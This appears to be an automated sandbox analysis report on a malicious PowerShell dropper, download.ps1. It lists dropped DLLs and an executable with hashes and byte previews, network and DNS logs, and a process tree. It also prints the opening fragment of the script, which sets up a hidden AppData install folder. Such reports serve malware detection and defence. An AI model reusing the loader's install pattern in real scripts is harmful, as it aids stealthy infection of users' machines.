                                                                                                                                                                                                            SHA1:775F258D8B530C6EA9F0DD3D1D0B61C1948C25D2
                                                                                                                                                                                                            SHA-256:0C0A66505093B6A4BB3475F716BD3D9552095776F6A124709C13B3F9552C7D99
                                                                                                                                                                                                            SHA-512:F4BF3398F50FDD3AB7E3F02C1F940B4C8B5650ED7AF16C626CCD1B934053BA73A35F96DA03B349C1EB614BB23E0BC6B5CC58B07B7553A5C93C6D23124F324A33
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........s]{v ]{v ]{v M.w!_{v M.. S{v M.u!Y{v M.r!U{v M.s!P{v T.. G{v ..w!V{v ]{w .zv ..{!.{v ..v!\{v ... \{v ..t!\{v Rich]{v ........................PE..d......g.........." ...).:+..T9......J........................................d.....uF]...`...........................................O.....h.P.......d......0].......\../....d..... A3.T.....................I.(....?3.@............P+..............................text....8+......:+................. ..`.rdata....%..P+...%..>+.............@..@.data...$9....P..N....P.............@....pdata.......0]...... U.............@..@PyRuntim.N...._..P....W.............@....rsrc.........d.......[.............@..@.reloc........d.......[.............@..B........................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):30992
                                                                                                                                                                                                            Entropy (8bit):6.554484610649281
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:7hhxm9tKLhuoNHfzzlvFy0ZZIJ9GckHQIYiSy1pCQ4HWSJIVE8E9VF0Ny6sC:tCytHf98uZIJ9Gx5YiSyvy2ES
                                                                                                                                                                                                            MD5:20831703486869B470006941B4D996F2
                                                                                                                                                                                                            SHA1:28851DFD43706542CD3EF1B88B5E2749562DFEE0
                                                                                                                                                                                                            SHA-256:78E5994C29D8851F28B5B12D59D742D876683AEA58ECEEA1FB895B2036CDCDEB
                                                                                                                                                                                                            SHA-512:4AAF5D66D2B73F939B9A91E7EDDFEB2CE2476C625586EF227B312230414C064AA850B02A4028363AA4664408C9510594754530A6D026A0A84BE0168D677C1BC4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........tV..'V..'V..'_.j'T..'F:.&T..'F:.&R..'F:.&^..'F:.&Z..'.;.&T..'V..'...'...&S..'.;.&W..'.;.&W..'.;.'W..'.;.&W..'RichV..'................PE..d.....g.........." ...).....2............................................................`..........................................@..L...<A..x....p.......`.......J.../......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data...p....P.......8..............@....pdata.......`.......:..............@..@.rsrc........p.......>..............@..@.reloc..L............H..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):709904
                                                                                                                                                                                                            Entropy (8bit):5.861739047785334
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:FYGdLI/X77mvfldCKGihH32W3cnPSqrUgLIe:FYGW7qNxr3cnPXLIe
                                                                                                                                                                                                            MD5:0902D299A2A487A7B0C2D75862B13640
                                                                                                                                                                                                            SHA1:04BCBD5A11861A03A0D323A8050A677C3A88BE13
                                                                                                                                                                                                            SHA-256:2693C7EE4FBA55DC548F641C0CB94485D0E18596FFEF16541BD43A5104C28B20
                                                                                                                                                                                                            SHA-512:8CBEF5A9F2D24DA1014F8F1CCBDDD997A084A0B04DD56BCB6AC38DDB636D05EF7E4EA7F67A085363AAD3F43D45413914E55BDEF14A662E80BE955E6DFC2FECA3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Q.............(.....(.....(.....(.....)................).....).....)x....)....Rich..................PE..d.....g.........." ...).B...f......P,..............................................<.....`.........................................P...X................................/..........p...T...........................0...@............`..h............................text....@.......B.................. ..`.rdata...?...`...@...F..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):38755410
                                                                                                                                                                                                            Entropy (8bit):7.995839341470473
                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                            SSDEEP:786432:O+gX4BMdhwzTQXR5FbPp6FcSS5U/LT2KzVyPVLBdebXMb8VH/zEa:MXGMK4XR3bLSCU/+6yPl3ebcBa
                                                                                                                                                                                                            MD5:F17797CAAB0F1CB8D5813853AAD786CA
                                                                                                                                                                                                            SHA1:5B67F3D290B2E027EA617F239310BAE47083EE54
                                                                                                                                                                                                            SHA-256:C24D6A9DE8F394854E91A84ECE64E9A5A8FCC8B66E7E67AC47473E5CF709CFDE
                                                                                                                                                                                                            SHA-512:55D1F0217028564189545E9F7ECF8E0B087BABA792F97A3ADD825841C16A1B52368042EF08A1860E726749B4706456EC52236245C3CD8B15545630D8881D80A6
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n=..*\.Z*\.Z*\.Za$.[-\.Za$.[.\.Za$.[ \.Z:..Z)\.Z:..[#\.Z:..[;\.Z:..[.\.Za$.[!\.Z*\.Z.\.Zb..[3\.Zb..[+\.ZRich*\.Z........PE..d...g.Vg.........."....).....\.................@....................................J.O...`.................................................\...x....p.......@..P"...........p..d...................................@...@............................................text............................... ..`.rdata..P*.......,..................@..@.data....S..........................@....pdata..P"...@...$..................@..@.rsrc........p......................@..@.reloc..d....p......................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):38486075
                                                                                                                                                                                                            Entropy (8bit):7.998262931276649
                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                            SSDEEP:786432:L6ivV/JVTmIg5sc8TcKuWLN4xu5GFsxHF8lhP7TK5yt86iJ/P4h:/vBfKIrc8Tcfrx2GFgF8lhDT4yez4h
                                                                                                                                                                                                            MD5:21786840938E823B9AA236AD8E27FC97
                                                                                                                                                                                                            SHA1:B26CE17507089D5BFEA50DEC8E987E1EE69AC79F
                                                                                                                                                                                                            SHA-256:08BE38EC51A77DE7FB197A79B5E15AD88AF3FC1975A883CD7D316584B4865939
                                                                                                                                                                                                            SHA-512:9C8323CC52762649ED5240F50EEEB2C03237E528BC1F38607D592CC60818A7125C61280096AEA7C810EEA0DF6997447F37C05C6979991FBE7BC8935F767DF397
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:PK........4..Y....?K.R\O.....check.exe.]{`.W...TZ...... ..e...hw.......hh.j...V....c.`...]}IhU...,mQ-.."(Z...s...D..........;.{...d..os.l.:....l%6....._5..o....w.,..w..?........=a.#...=.p...{B.8.....}...yt...bc.I.e..}....:..72.r.M.....?/d..m.sH[~^.n....i....`\8.%...y....\.N...d<.>.3....g...F..6......I[+[=G......m(..o...'N..n...t....-?.3...>..m....A...b=j."....).2..../.[.[V....(...f....?..w.....V9lK..>.C..).zY.`.8..n.mD...F.F"...Y..=..9j..w......s....s..6...x]^+I.....Jy.&N..;..x..R......c..pT].+[4)q..N...j.).cI...F+j.]N[Q.V......A)R....^...*.n....J(jA.:.2.hhb.R.Ht..............!.._=.rV....;l...j......O.r...W.(..y......Pl[.....l.-ak>u`..)..s!.i..]..)..>.Z..a.e.z7.n..X..C..:&...F.c.....'.H...c.h..*......3...;.x...]...B.......W.$!J......OJ..@z.U.W..-7..@.7m..^.T..J....D.P.}...).....T.?1..|8o.Z..S..+*.....e...Y...R.....,...C........u.6.@E..8.nV.@.....w.o.o.o.}e.u..9u...)..(..<UA..?..?1..........SJ3.....b.R.....+.. z..r.....$%.Ot..j..)-.`5R
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6225
                                                                                                                                                                                                            Entropy (8bit):3.7480810300259764
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:hN2XHUlw/C7U202fukvhkvklCywijZaml6nSogZoIJ4JaDZamlYnSogZoIJ4JO1:aX0lgCQrzkvhkvCCtsZam/HDZamJHR
                                                                                                                                                                                                            MD5:FE1C83466C38C1C323630876A64BDAF0
                                                                                                                                                                                                            SHA1:B527144E6749A1942E5B2CEB20BCF91674179E1B
                                                                                                                                                                                                            SHA-256:40C2BA9FA31FF77EA4C7C2E7965A52C055C1D67D49A7E9A292D7EFBCC9A72B2C
                                                                                                                                                                                                            SHA-512:6CB00E1B14F378A8E28637036E7D1392A965DCE0C0DAE11E153053ECB570C0F7874CA7FB7EA03075AE25C37F20E661CA6CE6CF9E9994AD3693D5C013F2BF98BB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:...................................FL..................F.".. .....*_......TJ..z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_....O..TJ...u..TJ......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.YU...........................3*N.A.p.p.D.a.t.a...B.V.1......YS...Roaming.@......EW.=.YS.............................$.R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=.YO...............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=.YO...........................b...W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=.YO.....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=.YO.....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=.YW.....9...........
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6225
                                                                                                                                                                                                            Entropy (8bit):3.7480810300259764
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:hN2XHUlw/C7U202fukvhkvklCywijZaml6nSogZoIJ4JaDZamlYnSogZoIJ4JO1:aX0lgCQrzkvhkvCCtsZam/HDZamJHR
                                                                                                                                                                                                            MD5:FE1C83466C38C1C323630876A64BDAF0
                                                                                                                                                                                                            SHA1:B527144E6749A1942E5B2CEB20BCF91674179E1B
                                                                                                                                                                                                            SHA-256:40C2BA9FA31FF77EA4C7C2E7965A52C055C1D67D49A7E9A292D7EFBCC9A72B2C
                                                                                                                                                                                                            SHA-512:6CB00E1B14F378A8E28637036E7D1392A965DCE0C0DAE11E153053ECB570C0F7874CA7FB7EA03075AE25C37F20E661CA6CE6CF9E9994AD3693D5C013F2BF98BB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:...................................FL..................F.".. .....*_......TJ..z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_....O..TJ...u..TJ......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.YU...........................3*N.A.p.p.D.a.t.a...B.V.1......YS...Roaming.@......EW.=.YS.............................$.R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=.YO...............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=.YO...........................b...W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=.YO.....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=.YO.....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=.YW.....9...........
                                                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1835008
                                                                                                                                                                                                            Entropy (8bit):4.416682503998231
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:icifpi6ceLPL9skLmb0mISWSPtaJG8nAgex285i2MMhA20X4WABlGuND5+:Pi58ISWIZBk2MM6AFBho
                                                                                                                                                                                                            MD5:6A9BE76963A1E05303FAB569A8A23D60
                                                                                                                                                                                                            SHA1:5FFF02991250267FB650F67A20D178B684CCCED1
                                                                                                                                                                                                            SHA-256:3DD4F572E413885813E736D5C8F26C3441A742C6F4F0299591D2384FD8FF50C0
                                                                                                                                                                                                            SHA-512:65AFB93196E0E5F829D8E504A97F836F01800A6F0B7B2B18D7D19AD16C9A7228480E10B4526433D274B30BA76DEDF7F5B59F89376189FBED94287BF801E4E3D7
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....UJ...............................................................................................................................................................................................................................................................................................................................................,.0........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            File type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                            Entropy (8bit):5.998969201183247
                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                              File name:download.ps1
                                                                                                                                                                                                              File size:51'316'506 bytes
                                                                                                                                                                                                              MD5:0188ae5e15c1edc64ab1ae6ca5b6e72f
                                                                                                                                                                                                              SHA1:29f44de502cc3c08d6cef1c020ad9e7ef3f953bc
                                                                                                                                                                                                              SHA256:8215c16d5462d70b3c146a74a6ac6bf38b434691bd27d5c46754ace5fd2b4964
                                                                                                                                                                                                              SHA512:77552501f990a86a214d15e3cba8ce4722e8ef8d825d88b280d61d9359c8a0d24ac36f7c6d4d28fc05a9c5d24ce0dbd29da1f134a7af3b1d0df42cd064cb5f9e
                                                                                                                                                                                                              SSDEEP:49152:llh6KeiZ9CruD6ch8wsawJRg2bN3oRIeEwd5RifHsfSn6DTIakmcWMlcsTk0bGaF:k
                                                                                                                                                                                                              TLSH:91B73320AEAA6DBE0A6CC33D707F5F1D1BB00FD1844DE1DA47A0B9C7165FB41562B829
                                                                                                                                                                                                              File Content Preview:${random_error_action_preference}="Stop";Set-Location $Env:AppData;${random_install_path}="$Env:AppData\HseeHuht";if(Test-Path ${random_install_path}){if(Test-Path "$Env:AppData\MRisZmwP.txt"){Remove-Item "$Env:AppData\MRisZmwP.txt"};Exit};$domain=(Get-Wm
                                                                                                                                                                                                              Icon Hash:3270d6baae77db44
                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                              Dec 9, 2024 17:11:30.208748102 CET49796443192.168.2.7104.20.22.46
                                                                                                                                                                                                              Dec 9, 2024 17:11:30.208787918 CET44349796104.20.22.46192.168.2.7
                                                                                                                                                                                                              Dec 9, 2024 17:11:30.208982944 CET49796443192.168.2.7104.20.22.46
                                                                                                                                                                                                              Dec 9, 2024 17:11:30.210767031 CET49796443192.168.2.7104.20.22.46
                                                                                                                                                                                                              Dec 9, 2024 17:11:30.210781097 CET44349796104.20.22.46192.168.2.7
                                                                                                                                                                                                              Dec 9, 2024 17:11:31.537476063 CET44349796104.20.22.46192.168.2.7
                                                                                                                                                                                                              Dec 9, 2024 17:11:31.553222895 CET49796443192.168.2.7104.20.22.46
                                                                                                                                                                                                              Dec 9, 2024 17:11:31.553241014 CET44349796104.20.22.46192.168.2.7
                                                                                                                                                                                                              Dec 9, 2024 17:11:31.554582119 CET44349796104.20.22.46192.168.2.7
                                                                                                                                                                                                              Dec 9, 2024 17:11:31.554696083 CET49796443192.168.2.7104.20.22.46
                                                                                                                                                                                                              Dec 9, 2024 17:11:31.579945087 CET49796443192.168.2.7104.20.22.46
                                                                                                                                                                                                              Dec 9, 2024 17:11:31.580204010 CET44349796104.20.22.46192.168.2.7
                                                                                                                                                                                                              Dec 9, 2024 17:11:31.580383062 CET49796443192.168.2.7104.20.22.46
                                                                                                                                                                                                              Dec 9, 2024 17:11:31.583143950 CET49796443192.168.2.7104.20.22.46
                                                                                                                                                                                                              Dec 9, 2024 17:11:40.258697987 CET49811443192.168.2.7104.20.22.46
                                                                                                                                                                                                              Dec 9, 2024 17:11:40.258745909 CET44349811104.20.22.46192.168.2.7
                                                                                                                                                                                                              Dec 9, 2024 17:11:40.258891106 CET49811443192.168.2.7104.20.22.46
                                                                                                                                                                                                              Dec 9, 2024 17:11:40.260371923 CET49811443192.168.2.7104.20.22.46
                                                                                                                                                                                                              Dec 9, 2024 17:11:40.260386944 CET44349811104.20.22.46192.168.2.7
                                                                                                                                                                                                              Dec 9, 2024 17:11:41.572244883 CET44349811104.20.22.46192.168.2.7
                                                                                                                                                                                                              Dec 9, 2024 17:11:41.573451996 CET49811443192.168.2.7104.20.22.46
                                                                                                                                                                                                              Dec 9, 2024 17:11:41.573477983 CET44349811104.20.22.46192.168.2.7
                                                                                                                                                                                                              Dec 9, 2024 17:11:41.574727058 CET44349811104.20.22.46192.168.2.7
                                                                                                                                                                                                              Dec 9, 2024 17:11:41.574820042 CET49811443192.168.2.7104.20.22.46
                                                                                                                                                                                                              Dec 9, 2024 17:11:41.577219009 CET49811443192.168.2.7104.20.22.46
                                                                                                                                                                                                              Dec 9, 2024 17:11:41.577380896 CET44349811104.20.22.46192.168.2.7
                                                                                                                                                                                                              Dec 9, 2024 17:11:41.577496052 CET49811443192.168.2.7104.20.22.46
                                                                                                                                                                                                              Dec 9, 2024 17:11:41.577496052 CET49811443192.168.2.7104.20.22.46
                                                                                                                                                                                                              Dec 9, 2024 17:11:47.801933050 CET49828443192.168.2.7104.20.22.46
                                                                                                                                                                                                              Dec 9, 2024 17:11:47.801985025 CET44349828104.20.22.46192.168.2.7
                                                                                                                                                                                                              Dec 9, 2024 17:11:47.802113056 CET49828443192.168.2.7104.20.22.46
                                                                                                                                                                                                              Dec 9, 2024 17:11:47.803046942 CET49828443192.168.2.7104.20.22.46
                                                                                                                                                                                                              Dec 9, 2024 17:11:47.803061962 CET44349828104.20.22.46192.168.2.7
                                                                                                                                                                                                              Dec 9, 2024 17:11:49.048769951 CET44349828104.20.22.46192.168.2.7
                                                                                                                                                                                                              Dec 9, 2024 17:11:49.050061941 CET49828443192.168.2.7104.20.22.46
                                                                                                                                                                                                              Dec 9, 2024 17:11:49.050086021 CET44349828104.20.22.46192.168.2.7
                                                                                                                                                                                                              Dec 9, 2024 17:11:49.051155090 CET44349828104.20.22.46192.168.2.7
                                                                                                                                                                                                              Dec 9, 2024 17:11:49.051224947 CET49828443192.168.2.7104.20.22.46
                                                                                                                                                                                                              Dec 9, 2024 17:11:49.054222107 CET49828443192.168.2.7104.20.22.46
                                                                                                                                                                                                              Dec 9, 2024 17:11:49.054423094 CET44349828104.20.22.46192.168.2.7
                                                                                                                                                                                                              Dec 9, 2024 17:11:49.054480076 CET49828443192.168.2.7104.20.22.46
                                                                                                                                                                                                              Dec 9, 2024 17:11:49.054522991 CET49828443192.168.2.7104.20.22.46
                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                              Dec 9, 2024 17:11:30.059823990 CET5247953192.168.2.71.1.1.1
                                                                                                                                                                                                              Dec 9, 2024 17:11:30.205655098 CET53524791.1.1.1192.168.2.7
                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                              Dec 9, 2024 17:11:30.059823990 CET192.168.2.71.1.1.10x195eStandard query (0)nodejs.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                              Dec 9, 2024 17:11:30.205655098 CET1.1.1.1192.168.2.70x195eNo error (0)nodejs.org104.20.22.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Dec 9, 2024 17:11:30.205655098 CET1.1.1.1192.168.2.70x195eNo error (0)nodejs.org104.20.23.46A (IP address)IN (0x0001)false

                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                              Start time:11:10:44
                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
                                                                                                                                                                                                              Imagebase:0x7ff741d30000
                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:1
                                                                                                                                                                                                              Start time:11:10:44
                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              Imagebase:0x7ff75da10000
                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:4
                                                                                                                                                                                                              Start time:11:11:07
                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\HseeHuht\check.exe"
                                                                                                                                                                                                              Imagebase:0x7ff60b120000
                                                                                                                                                                                                              File size:38'755'410 bytes
                                                                                                                                                                                                              MD5 hash:F17797CAAB0F1CB8D5813853AAD786CA
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                              Start time:11:11:15
                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\HseeHuht\check.exe"
                                                                                                                                                                                                              Imagebase:0x7ff60b120000
                                                                                                                                                                                                              File size:38'755'410 bytes
                                                                                                                                                                                                              MD5 hash:F17797CAAB0F1CB8D5813853AAD786CA
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                                              Start time:11:11:16
                                                                                                                                                                                                              Start date:09/12/2024
                                                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
